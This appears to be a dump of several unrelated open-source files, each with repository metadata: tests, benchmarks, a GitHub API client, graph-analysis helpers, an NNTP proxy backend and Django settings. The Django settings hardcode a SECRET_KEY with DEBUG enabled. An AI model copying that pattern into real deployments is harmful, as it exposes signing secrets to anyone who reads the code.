"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1588"
},
{
"name": "PowerShell",
"bytes": "17312"
},
{
"name": "Python",
"bytes": "6330849"
},
{
"name": "Shell",
"bytes": "6748"
}
],
"symlink_target": ""
} |
from model.group import Group
from random import randrange
def test_delete_some_group(app):
if app.group.count()==0:
app.group.create(Group(name="test"))
old_groups=app.group.get_group_list()
index=randrange(len(old_groups))
app.group.delete_group_by_index(index)
new_groups=app.group.get_group_list()
assert len(old_groups)-1==len(new_groups)
old_groups[index:index+1]=[]
assert old_groups==new_groups | {
"content_hash": "7b0f79f46338ec2267c498f8949216f8",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 45,
"avg_line_length": 34.07692307692308,
"alnum_prop": 0.6952595936794582,
"repo_name": "ritatsetsko/python_training",
"id": "c9d54db1171e918958a376b3f28813f43133d3b8",
"size": "443",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_del_group.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13917"
}
],
"symlink_target": ""
} |
"""Generates test input data for Causomatic that tries to mimic the scale of
Causes' datasets for scoring algorithm performance benchmarking. In particular,
this will generate a few *very large* sets, more sets with 10x less users, ad
nauseum"""
import random
if __name__ == '__main__':
# generate a nice, decreasing distribution
set_sizes = [((10 ** i),) * (10 - i) for i in range(7, 0, -1)]
# flatten the list
set_sizes = [item for sublist in set_sizes for item in sublist]
print "set sizes: %s" % str(set_sizes)
id_upper_bound = 2 * 10 ** 7
print "building user_ids from 0 to %d" % id_upper_bound
user_ids = range(id_upper_bound)
print "finished building user_id set, generating memberships"
with open('sample.data', 'wb+') as fh:
for set_id, set_size in enumerate(set_sizes, start=1):
print "Building user ids for set size %d" % set_size
random.shuffle(user_ids)
print "Writing results to sample.data..."
fh.write(
''.join('%d,%d\n' % (user_id, set_id)
for user_id in user_ids[:set_size]))
| {
"content_hash": "7e53db477fa034c056b4ea0a17a9a5b1",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 79,
"avg_line_length": 37.3448275862069,
"alnum_prop": 0.6472760849492152,
"repo_name": "causes/suggestomatic",
"id": "ef1829b3e169c8c581234a6aa0aad063d9433436",
"size": "1083",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "generate_performance_data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "8096"
},
{
"name": "Python",
"bytes": "15659"
}
],
"symlink_target": ""
} |
import warnings
import numpy as np
try:
import scipy.stats as stats
except ImportError:
pass
from .common import Benchmark
class Anderson_KSamp(Benchmark):
def setup(self, *args):
self.rand = [np.random.normal(loc=i, size=1000) for i in range(3)]
def time_anderson_ksamp(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
stats.anderson_ksamp(self.rand)
class CorrelationFunctions(Benchmark):
param_names = ['alternative']
params = [
['two-sided', 'less', 'greater']
]
def setup(self, mode):
a = np.random.rand(2,2) * 10
self.a = a
def time_fisher_exact(self, alternative):
oddsratio, pvalue = stats.fisher_exact(self.a, alternative=alternative)
class InferentialStats(Benchmark):
def setup(self):
np.random.seed(12345678)
self.a = stats.norm.rvs(loc=5, scale=10, size=500)
self.b = stats.norm.rvs(loc=8, scale=10, size=20)
self.c = stats.norm.rvs(loc=8, scale=20, size=20)
def time_ttest_ind_same_var(self):
# test different sized sample with variances
stats.ttest_ind(self.a, self.b)
stats.ttest_ind(self.a, self.b, equal_var=False)
def time_ttest_ind_diff_var(self):
# test different sized sample with different variances
stats.ttest_ind(self.a, self.c)
stats.ttest_ind(self.a, self.c, equal_var=False)
class Distribution(Benchmark):
param_names = ['distribution', 'properties']
params = [
['cauchy', 'gamma', 'beta'],
['pdf', 'cdf', 'rvs', 'fit']
]
def setup(self, distribution, properties):
np.random.seed(12345678)
self.x = np.random.rand(100)
def time_distribution(self, distribution, properties):
if distribution == 'gamma':
if properties == 'pdf':
stats.gamma.pdf(self.x, a=5, loc=4, scale=10)
elif properties == 'cdf':
stats.gamma.cdf(self.x, a=5, loc=4, scale=10)
elif properties == 'rvs':
stats.gamma.rvs(size=1000, a=5, loc=4, scale=10)
elif properties == 'fit':
stats.gamma.fit(self.x, loc=4, scale=10)
elif distribution == 'cauchy':
if properties == 'pdf':
stats.cauchy.pdf(self.x, loc=4, scale=10)
elif properties == 'cdf':
stats.cauchy.cdf(self.x, loc=4, scale=10)
elif properties == 'rvs':
stats.cauchy.rvs(size=1000, loc=4, scale=10)
elif properties == 'fit':
stats.cauchy.fit(self.x, loc=4, scale=10)
elif distribution == 'beta':
if properties == 'pdf':
stats.beta.pdf(self.x, a=5, b=3, loc=4, scale=10)
elif properties == 'cdf':
stats.beta.cdf(self.x, a=5, b=3, loc=4, scale=10)
elif properties == 'rvs':
stats.beta.rvs(size=1000, a=5, b=3, loc=4, scale=10)
elif properties == 'fit':
stats.beta.fit(self.x, loc=4, scale=10)
# Retain old benchmark results (remove this if changing the benchmark)
time_distribution.version = "fb22ae5386501008d945783921fe44aef3f82c1dafc40cddfaccaeec38b792b0"
class DescriptiveStats(Benchmark):
param_names = ['n_levels']
params = [
[10, 1000]
]
def setup(self, n_levels):
np.random.seed(12345678)
self.levels = np.random.randint(n_levels, size=(1000, 10))
def time_mode(self, n_levels):
stats.mode(self.levels, axis=0)
class GaussianKDE(Benchmark):
def setup(self):
np.random.seed(12345678)
n = 2000
m1 = np.random.normal(size=n)
m2 = np.random.normal(scale=0.5, size=n)
xmin = m1.min()
xmax = m1.max()
ymin = m2.min()
ymax = m2.max()
X, Y = np.mgrid[xmin:xmax:200j, ymin:ymax:200j]
self.positions = np.vstack([X.ravel(), Y.ravel()])
values = np.vstack([m1, m2])
self.kernel = stats.gaussian_kde(values)
def time_gaussian_kde_evaluate_few_points(self):
# test gaussian_kde evaluate on a small number of points
self.kernel(self.positions[:, :10])
def time_gaussian_kde_evaluate_many_points(self):
# test gaussian_kde evaluate on many points
self.kernel(self.positions)
class GroupSampling(Benchmark):
param_names = ['dim']
params = [[3, 10, 50, 200]]
def setup(self, dim):
np.random.seed(12345678)
def time_unitary_group(self, dim):
stats.unitary_group.rvs(dim)
def time_ortho_group(self, dim):
stats.ortho_group.rvs(dim)
def time_special_ortho_group(self, dim):
stats.special_ortho_group.rvs(dim)
class BinnedStatistic(Benchmark):
def setup(self):
np.random.seed(12345678)
self.inp = np.random.rand(9999).reshape(3, 3333) * 200
self.subbin_x_edges = np.arange(0, 200, dtype=np.float32)
self.subbin_y_edges = np.arange(0, 200, dtype=np.float64)
self.ret = stats.binned_statistic_dd(
[self.inp[0], self.inp[1]], self.inp[2], statistic="std",
bins=[self.subbin_x_edges, self.subbin_y_edges])
def time_binned_statistic_dd_std(self):
stats.binned_statistic_dd(
[self.inp[0], self.inp[1]], self.inp[2], statistic="std",
bins=[self.subbin_x_edges, self.subbin_y_edges])
def time_binned_statistic_dd_std_reuse_bin(self):
stats.binned_statistic_dd(
[self.inp[0], self.inp[1]], self.inp[2], statistic="std",
binned_statistic_result=self.ret)
| {
"content_hash": "cb07b01f7da576c7c1e2fe52f7863153",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 98,
"avg_line_length": 32.55172413793103,
"alnum_prop": 0.591454802259887,
"repo_name": "pizzathief/scipy",
"id": "56ef5ac457d5c9faa7ea25951ae50670f460e1e2",
"size": "5664",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "benchmarks/benchmarks/stats.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4395775"
},
{
"name": "C++",
"bytes": "649767"
},
{
"name": "Dockerfile",
"bytes": "1236"
},
{
"name": "Fortran",
"bytes": "5367672"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12449825"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
import os
from typing import Optional
import aiohttp
import link_header
from async_timeout import timeout
import aiogithub
from aiogithub import objects
from aiogithub.objects import response
from aiogithub.exceptions import HttpException
GITHUB_DEFAULT_CONTENT_TYPE = 'application/vnd.github.v3+json'
GITHUB_PREVIEW_CONTENT_TYPE = 'application/vnd.github.black-cat-preview+json'
class GitHub:
def __init__(self, token: str = None, items_per_page=100, timeout_secs=10,
max_paginated_items=1000, enable_preview_api=False):
"""
Initialises a GitHub API client.
If no personal access token is provided, the client will check the
GITHUB_TOKEN environment variable for a token and use that if
present. If still without a token, the GitHub API will be used
unauthenticated.
:param token: GitHub personal access token
:param items_per_page: Items to request per page, must be
between 1 and 100
:param timeout_secs: Timeout in seconds for HTTP requests
:param max_paginated_items: Safety limit for when iterating
through list results to avoid
inadvertently making a huge number of
requests
"""
if not token:
token = os.environ.get('GITHUB_TOKEN')
content_type = GITHUB_PREVIEW_CONTENT_TYPE if enable_preview_api \
else GITHUB_DEFAULT_CONTENT_TYPE
headers = {
'Accept': content_type,
'User-Agent': 'aiogithub/{}'.format(aiogithub.__version__)
}
if token:
headers['Authorization'] = 'token ' + token
self._client = aiohttp.ClientSession(headers=headers)
self._timeout = timeout_secs
self._base_url = 'https://api.github.com'
self._token = token
self._items_per_page = items_per_page
self._max_paginated_items = max_paginated_items
self._last_limits = None
@property
def last_rate_limit(self) -> Optional[dict]:
"""
The rate limits that were sent by GitHub in the most recent
request.
:type: Optional[dict]
"""
return self._last_limits
async def get_user(self, username, defer_fetch=False) -> objects.User:
"""
Gets a single user.
:param username: The name of the user to fetch the details of.
:param defer_fetch: Whether to defer fetching of data about this user.
:return: An object representing the user.
"""
fetch_params = {
'login': username
}
return await self._get_object_relative_url(
objects.User, defer_fetch=defer_fetch,
fetch_params=fetch_params)
async def get_organization(self, username, defer_fetch=False) -> \
objects.Organization:
"""
Gets a single organization.
:param username: The username/login of the organization to fetch the
details of.
:param defer_fetch: Whether to defer fetching of data about this
organization.
:return: An object representing the organization.
"""
fetch_params = {
'login': username
}
return await self._get_object_relative_url(
objects.Organization, defer_fetch=defer_fetch,
fetch_params=fetch_params)
async def get_repo(self, owner_name, repo_name,
defer_fetch=False) -> objects.Repo:
"""
Gets a single repository.
:param owner_name: The name of the user or organisation that owns
the repository.
:param repo_name: The name of the repository.
:param defer_fetch: Whether to defer fetching of data about this
repository.
:return: An object representing the repository.
"""
fetch_params = {
'name': repo_name,
'owner': {
'login': owner_name
}
}
return await self._get_object_relative_url(
objects.Repo, defer_fetch=defer_fetch,
fetch_params=fetch_params)
async def get_branch(self, owner_name, repo_name,
branch_name) -> objects.Branch:
"""
Gets a single branch of a repository.
"""
fetch_params = {
'login': owner_name,
'repo': repo_name,
'branch': branch_name
}
return await self._get_object_relative_url(objects.Branch,
fetch_params=fetch_params)
async def get_issue(self, owner_name, repo_name,
issue_number) -> objects.Issue:
"""
Gets a single issue of a repository.
"""
fetch_params = {
'login': owner_name,
'repo': repo_name,
'number': issue_number
}
return await self._get_object_relative_url(objects.Issue,
fetch_params=fetch_params)
async def get_pull_request(self, owner_name, repo_name,
issue_number) -> objects.PullRequest:
"""
Gets a single pull request of a repository.
"""
fetch_params = {
'login': owner_name,
'repo': repo_name,
'number': issue_number
}
return await self._get_object_relative_url(objects.PullRequest,
fetch_params=fetch_params)
async def get_rate_limit(self) -> objects.RateLimit:
"""
Gets the current rate limit values.
"""
return await self._get_object_relative_url(objects.RateLimit)
async def get_current_user(self) -> objects.AuthenticatedUser:
"""
Gets the current authenticated user.
"""
return objects.AuthenticatedUser(
self, *await self.get_relative_url('user')
)
def get_users(self, since=None) -> \
objects.PaginatedListProxy[objects.User]:
"""
Gets all users.
"""
# FIXME: add since support
return self.get_list_relative_url('users', objects.User)
def get_repos(self, since=None) -> \
objects.PaginatedListProxy[objects.Repo]:
"""
Gets all repos.
"""
# FIXME: add since support
return self.get_list_relative_url('repos', objects.Repo)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> 'GitHub':
return self
async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
await self.close()
async def get_absolute_url(self, url, is_paginated=False) -> tuple:
with timeout(self._timeout):
params = {}
if is_paginated:
params['per_page'] = self._items_per_page
async with self._client.get(
url, params=params) as response:
if response.status >= 400:
raise HttpException(response.status, url)
self._last_limits = {
'limit': response.headers.get('X-RateLimit-Limit'),
'remaining': response.headers.get('X-RateLimit-Limit')
}
link_header_value = response.headers.get('link')
links_dict = {}
if link_header_value:
links = link_header.parse(link_header_value)
links_dict = {link.rel: link.href for link in links.links}
return await response.json(), self._last_limits, links_dict
async def get_relative_url(self, url, is_paginated=False) -> tuple:
return await self.get_absolute_url(self._base_url + '/' + url,
is_paginated=is_paginated)
async def get_url(self, url: str, relative: bool, is_paginated=False) -> \
tuple:
if relative:
return await self.get_relative_url(url, is_paginated)
else:
return await self.get_absolute_url(url, is_paginated)
def get_list_relative_url(self, path, element_type,
fetch_params=None):
return self.get_list_absolute_url(self._base_url + '/' + path,
element_type,
fetch_params=fetch_params)
def get_list_absolute_url(self, url, element_type,
fetch_params=None):
return response.PaginatedListProxy(
self, url, element_type, fetch_params
)
async def _get_object_relative_url(self, element_type,
defer_fetch=False,
fetch_params=None):
element = element_type(self, fetch_params=fetch_params)
if not defer_fetch:
await element.fetch_data()
return element
| {
"content_hash": "36c03b8e17ab995ca489be66f8ea1a1f",
"timestamp": "",
"source": "github",
"line_count": 250,
"max_line_length": 79,
"avg_line_length": 37.016,
"alnum_prop": 0.5446293494704992,
"repo_name": "reupen/aiogithub",
"id": "2086532182845328d5945e10a19e6cc378c3faa3",
"size": "9254",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aiogithub/aiogithub.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "64214"
}
],
"symlink_target": ""
} |
from collections import defaultdict
from . import core # noqa F401
from .core import ReachableObjectType
"""
Just a kitchen sink of methods that may be useful when analyzing the
reachability graph. We may want to refine / prune this file in the future.
"""
def classify_nodes(nodes):
"""
Return a summary count of the number of each kind of node.
"""
ctr = defaultdict(int)
for node in nodes:
ctr[ReachableObjectType.to_string(node.type)] += 1
return ctr
def group_by_common_keys(d):
"""
The input :d should be a dict whose values are sets. Suppose we had
k1 -> set(v1, v2, v3)
k2 -> set(v1, v2)
k3 -> set(v1, v2)
The output will be
frozenset(k1, k2, k3) -> set(v1, v2)
frozenset(k1) -> set(v3)
This can be useful for finding keep rules which overlap a lot in their
matched classes.
"""
value_to_keys = defaultdict(set)
for k, values in list(d.items()):
for v in values:
value_to_keys[v].add(k)
grouped_keys = defaultdict(set)
for value, keys in list(value_to_keys.items()):
grouped_keys[frozenset(keys)].add(value)
return grouped_keys
def find_nodes(graph, filter_fn):
"""
Find all nodes whose names pass the predicate :filter_fn.
"""
nodes = set()
for node in list(graph.nodes.values()):
if filter_fn(node.name):
nodes.add(node)
return nodes
def find_nodes_in_packages(graph, pkg_prefixes):
"""
Find all nodes that fall under the list of :pkg_prefixes.
"""
nodes = set()
for node in list(graph.nodes.values()):
for pkg_prefix in pkg_prefixes:
# If we have an array, use its base type
base_type = node.name.lstrip("[")
if base_type.startswith(pkg_prefix):
nodes.add(node)
return nodes
def find_boundary(graph, query_set):
"""
Find all the nodes that retain (i.e. point into) :query_set.
If we encounter an annotation node, we look for its retainers. Frequently,
they are members of the set itself. E.g. we have many instances of
@JsonSerialize(Foo.class)
public Foo { ... }
We don't want to mark JsonSerialize as a retainer of Foo.
Return a dictionary of
<retaining node> -> <set of retained nodes>
where the set of retained nodes are the immediate successors of the
retaining node that are inside :query_set.
"""
boundary = defaultdict(set)
to_visit = set(query_set)
visited = set()
while len(to_visit) > 0:
node = to_visit.pop()
if node in visited:
continue
visited.add(node)
for pred in node.preds:
if pred not in query_set:
if not pred.type == ReachableObjectType.ANNO:
boundary[pred].add(node)
else:
to_visit.add(pred)
return boundary
def group_members_by_class(graph):
"""
Return a map of class -> set of members in that class.
"""
grouped_members = defaultdict(set)
for (ty, name), node in list(graph.nodes.items()):
if ty in [ReachableObjectType.FIELD, ReachableObjectType.METHOD]:
cls, sep, _ = name.partition(";")
cls += ";"
try:
cls_node = graph.get_node(cls)
except KeyError:
continue
grouped_members[cls_node].add(node)
return grouped_members
def find_package_references(graph, pkg_prefixes):
"""
Find all nodes that retain classes under the list of :pkg_prefixes.
"""
query_set = find_nodes_in_packages(graph, pkg_prefixes)
return find_boundary(graph, query_set)
def get_dominated(graph, query_set):
"""
Find all nodes in the graph that cannot be reached from a root without
passing through :query_set.
"""
visited = set()
def mark(node):
if node in visited:
return
if node in query_set:
return
visited.add(node)
for succ in node.succs:
mark(succ)
seeds = [node for node in list(graph.nodes.values()) if len(node.preds) == 0]
for seed in seeds:
mark(seed)
closure = set()
for node in list(graph.nodes.values()):
if node not in visited:
closure.add(node)
return closure
class Ranker(object):
"""
Given a list of leak roots and leaked methods, rank the roots in order of
classes that they retain. We do this by making a weighted count of the
number of nodes reachable from each root. Methods are weighted most heavily
and fields least. For a given node reachable from N roots, we divide its
weight by N when calculating its contribution to each root's score. This is
similar to the LeakShare metric described in "BLeak: Automatically Debugging
Memory Leaks in Web Applications" by Vilk and Berger.
While calculating the ranking, we also record the set of leaked nodes
dominated by each root, i.e. the set of nodes that are only reachable via
that root.
"""
def __init__(self, roots, leaked_set):
self.counts = defaultdict(int)
self.leaked_set = leaked_set
for root in roots:
self.mark(root)
def mark(self, root):
"""
Populate self.counts so that it contains, for each leaked node, the
number of leak roots that it can be reached from.
"""
visited = set()
def mark_rec(node):
if node in visited or node not in self.leaked_set:
return
visited.add(node)
self.counts[node] += 1
for succ in node.succs:
mark_rec(succ)
for succ in root.succs:
mark_rec(succ)
def get_rank(self, root):
rank = 0.0
dominated = set()
visited = set()
def visit(node):
nonlocal rank
nonlocal dominated
if node in visited or node not in self.leaked_set:
return
visited.add(node)
if self.counts[node] == 1:
dominated.add(node)
if node.type == ReachableObjectType.METHOD:
rank += 1.0 / self.counts[node]
for succ in node.succs:
visit(succ)
for succ in root.succs:
visit(succ)
return (rank, dominated)
def rank(roots, leaked_set):
ranker = Ranker(roots, leaked_set)
results = [(root, ranker.get_rank(root)) for root in roots]
return sorted(results, key=lambda t: t[1][0], reverse=True)
| {
"content_hash": "0737755639ae0e7bda36bb7003ed441f",
"timestamp": "",
"source": "github",
"line_count": 235,
"max_line_length": 81,
"avg_line_length": 28.23404255319149,
"alnum_prop": 0.5987942727957799,
"repo_name": "facebook/redex",
"id": "afdf4909785691e84907c80a54f77823ec36bcbf",
"size": "6838",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tools/reachability-analysis/lib/analysis.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "1855"
},
{
"name": "C",
"bytes": "45691"
},
{
"name": "C++",
"bytes": "10822879"
},
{
"name": "CMake",
"bytes": "36765"
},
{
"name": "CSS",
"bytes": "2259"
},
{
"name": "Dockerfile",
"bytes": "232"
},
{
"name": "Java",
"bytes": "663048"
},
{
"name": "JavaScript",
"bytes": "12077"
},
{
"name": "Kotlin",
"bytes": "20642"
},
{
"name": "M4",
"bytes": "64700"
},
{
"name": "Makefile",
"bytes": "50587"
},
{
"name": "Perl",
"bytes": "1532"
},
{
"name": "Python",
"bytes": "494966"
},
{
"name": "Rust",
"bytes": "192507"
},
{
"name": "Shell",
"bytes": "25367"
}
],
"symlink_target": ""
} |
from django.contrib.admin.apps import SimpleAdminConfig
class MyCustomAdminConfig(SimpleAdminConfig):
verbose_name = "My custom default admin site."
default_site = "admin_default_site.sites.CustomAdminSite"
| {
"content_hash": "82d71e47d925c7d114bac2dd96c9ff06",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 61,
"avg_line_length": 36.166666666666664,
"alnum_prop": 0.7926267281105991,
"repo_name": "takis/django",
"id": "d2dde8784f0bedafd85a5532583161cf6b3700fb",
"size": "217",
"binary": false,
"copies": "17",
"ref": "refs/heads/master",
"path": "tests/admin_default_site/apps.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "91756"
},
{
"name": "HTML",
"bytes": "238967"
},
{
"name": "JavaScript",
"bytes": "157514"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Procfile",
"bytes": "47"
},
{
"name": "Python",
"bytes": "16141182"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "392"
}
],
"symlink_target": ""
} |
import nntplib
import re
import time
import StringIO
# We need setting.forward_host, which is the nntp server we forward to
import papercut.settings
settings = papercut.settings.CONF()
# This is an additional backend for Papercut, currently it's more or less proof-of-concept.
# It's a "forwarding proxy", that merely forwards all requests to a "real" NNTP server.
# Just for fun, the post command adds an additional header.
#
# Written by Gerhard Häring (gerhard@bigfoot.de)
def log(s):
# For debugging, replace with "pass" if this gets stable one day
print s
class Papercut_Storage:
def __init__(self):
self.nntp = nntplib.NNTP(settings.forward_host)
def group_exists(self, group_name):
try:
self.nntp.group(group_name)
except nntplib.NNTPTemporaryError, reason:
return 0
return 1
def get_first_article(self, group_name):
log(">get_first_article")
# Not implemented
return 1
def get_group_stats(self, container):
# log(">get_group_stats")
# Returns: (total, maximum, minimum)
max, min = container
return (max-min, max, min)
def get_message_id(self, msg_num, group):
return '<%s@%s>' % (msg_num, group)
def get_NEWGROUPS(self, ts, group='%'):
log(">get_NEWGROUPS")
date = time.strftime("%y%m%d", ts)
tim = time.strftime("%H%M%S", ts)
response, groups = self.nntp.newgroups(date, tim)
return "\r\n".join(["%s" % k for k in (1,2,3)])
def get_NEWNEWS(self, ts, group='*'):
log(">get_NEWNEWS")
articles = []
articles.append("<%s@%s>" % (id, group))
if len(articles) == 0:
return ''
else:
return "\r\n".join(articles)
def get_GROUP(self, group_name):
# Returns: (total, first_id, last_id)
log(">get_GROUP")
response, count, first, last, name = self.nntp.group(group_name)
return (count, first, last)
def get_LIST(self, username=""):
# Returns: list of (groupname, table)
log(">get_LIST")
response, lst= self.nntp.list()
def convert(x):
return x[0], (int(x[1]), int(x[2]))
lst = map(convert, lst)
return lst
def get_STAT(self, group_name, id):
log(">get_STAT")
try:
resp, nr, id = self.nntp.stat(id)
return nr
except nntplib.NNTPTemporaryError, reason:
return None
def get_ARTICLE(self, group_name, id):
log(">get_ARTICLE")
resp, nr, id, headerlines = self.nntp.head(id)
resp, nr, id, articlelines = self.nntp.article(id)
dobreak = 0
while 1:
if articlelines[0] == "":
dobreak = 1
del articlelines[0]
if dobreak:
break
return ("\r\n".join(headerlines), "\n".join(articlelines))
def get_LAST(self, group_name, current_id):
log(">get_LAST")
# Not implemented
return None
def get_NEXT(self, group_name, current_id):
log(">get_NEXT")
# Not implemented
return None
def get_HEAD(self, group_name, id):
log(">get_HEAD")
resp, nr, mid, headerlines = self.nntp.head(id)
return "\r\n".join(headerlines)
def get_BODY(self, group_name, id):
log(">get_BODY")
resp, nr, mid, bodylines = self.nntp.body(id)
return "\r\n".join(bodylines)
def get_XOVER(self, group_name, start_id, end_id='ggg'):
# subject\tauthor\tdate\tmessage-id\treferences\tbyte count\tline count\r\n
log(">get_XOVER")
xov = list(self.nntp.xover(start_id, end_id)[1])
nxov = []
for entry in xov:
entry = list(entry)
entry[5] = "\n".join(entry[5])
nxov.append("\t".join(entry))
return "\r\n".join(nxov)
def get_LIST_ACTIVE(self, pat):
log(">get_LIST_ACTIVE")
resp, list = self.nntp.longcmd('LIST ACTIVE %s' % pat)
return list
def get_XPAT(self, group_name, header, pattern, start_id, end_id='ggg'):
log(">get_XPAT")
return None
def get_LISTGROUP(self, group_name=""):
log(">get_LISTGROUP")
ids = []
self.nntp.putcmd("LISTGROUP %s" % group_name)
while 1:
curline = self.nntp.getline()
if curline == ".":
break
ids.append(curline)
return "\r\n".join(ids)
def get_XGTITLE(self, pattern="*"):
log(">get_XGTITLE")
resp, result = self.nntp.xgtitle(pattern)
return "\r\n".join(["%s %s" % (group, title) for group, title in result])
def get_XHDR(self, group_name, header, style, range):
log(">get_XHDR")
if style == "range":
range = "-".join(range)
resp, result = self.nntp.xhdr(header, range)
result = map(lambda x: x[1], result)
return "\r\n".join(result)
def do_POST(self, group_name, lines, ip_address, username=''):
log(">do_POST")
while lines.find("\r") > 0:
lines = lines.replace("\r", "")
lns = lines.split("\n")
counter = 0
for l in lns:
if l == "":
lns.insert(counter, "X-Modified-By: Papercut's forwarding backend")
break
counter +=1
lines = "\n".join(lns)
# we need to send an actual file
f = StringIO.StringIO(lines)
result = self.nntp.post(f)
return result
| {
"content_hash": "f4c5fe38e46263d13b317b5955598175",
"timestamp": "",
"source": "github",
"line_count": 177,
"max_line_length": 91,
"avg_line_length": 31.463276836158194,
"alnum_prop": 0.5514455018854373,
"repo_name": "jgrassler/papercut",
"id": "6fa5f4858fa5b3bbcb189eff470c4b25670c2e09",
"size": "5570",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "papercut/storage/forwarding_proxy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "248023"
},
{
"name": "Shell",
"bytes": "1892"
}
],
"symlink_target": ""
} |
try:
from djangoappengine.settings_base import *
has_djangoappengine = True
except ImportError:
has_djangoappengine = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
import os
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Activate django-dbindexer for the default database
DATABASES['native'] = DATABASES['default']
DATABASES['default'] = {'ENGINE': 'dbindexer', 'TARGET': 'native'}
AUTOLOAD_SITECONF = 'indexes'
SECRET_KEY = '=r-$b*8hglm+858&9t043hlm6-&6-3d3vfc4((7yd0dbrakhvi'
INSTALLED_APPS = (
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sessions',
#'django.contrib.admin',
'django.contrib.markup',
'djangotoolbox',
'autoload',
'dbindexer',
'blog',
# djangoappengine should come last, so it can override a few manage.py commands
'djangoappengine',
)
MIDDLEWARE_CLASSES = (
# This loads the index definitions, so it has to come first
'autoload.middleware.AutoloadMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.request',
'django.core.context_processors.media',
'django.core.context_processors.static',
)
# This test runner captures stdout and associates tracebacks with their
# corresponding output. Helps a lot with print-debugging.
TEST_RUNNER = 'djangotoolbox.test.CapturingTestSuiteRunner'
ADMIN_MEDIA_PREFIX = '/media/admin/'
MEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'media')
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), 'templates'),)
LOGIN_URL = '/login/'
LOGOUT_URL = '/logout/'
LOGIN_REDIRECT_URL = '/'
ROOT_URLCONF = 'urls'
| {
"content_hash": "6196715927aaf6586f58ebbf262c04c8",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 83,
"avg_line_length": 31.041666666666668,
"alnum_prop": 0.7261744966442953,
"repo_name": "DJMelonz/basic-blog",
"id": "7b807d43ee757e33ccd2df168237af2af9004557",
"size": "2235",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "133071"
},
{
"name": "Python",
"bytes": "4389459"
},
{
"name": "Ruby",
"bytes": "913"
}
],
"symlink_target": ""
} |
from direct.directnotify import DirectNotifyGlobal
from direct.distributed.DistributedObjectAI import DistributedObjectAI
class ObjectServerAI(DistributedObjectAI):
notify = DirectNotifyGlobal.directNotify.newCategory("ObjectServerAI")
def setName(self, todo0):
pass
def setDcHash(self, todo0):
pass
def setDateCreated(self, todo0):
pass
| {
"content_hash": "76303c16169cdce89b3f0cb90c45cd50",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 74,
"avg_line_length": 25.533333333333335,
"alnum_prop": 0.7519582245430809,
"repo_name": "silly-wacky-3-town-toon/SOURCE-COD",
"id": "cb2c3804f3da2b0527b9ccf4d2fee2bddfe7c8c2",
"size": "383",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "otp/distributed/ObjectServerAI.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "10249"
},
{
"name": "C",
"bytes": "1752256"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "5485400"
},
{
"name": "Emacs Lisp",
"bytes": "210083"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "NSIS",
"bytes": "1009050"
},
{
"name": "Objective-C",
"bytes": "21821"
},
{
"name": "PLSQL",
"bytes": "10200"
},
{
"name": "Pascal",
"bytes": "4986"
},
{
"name": "Perl6",
"bytes": "30612"
},
{
"name": "Puppet",
"bytes": "259"
},
{
"name": "Python",
"bytes": "33566014"
},
{
"name": "Shell",
"bytes": "14642"
},
{
"name": "Tcl",
"bytes": "2084458"
}
],
"symlink_target": ""
} |
"""
Helpers for reusable contract components.
Now that we have preconditions, postconditions, and invariants, let us provide some abstractions:
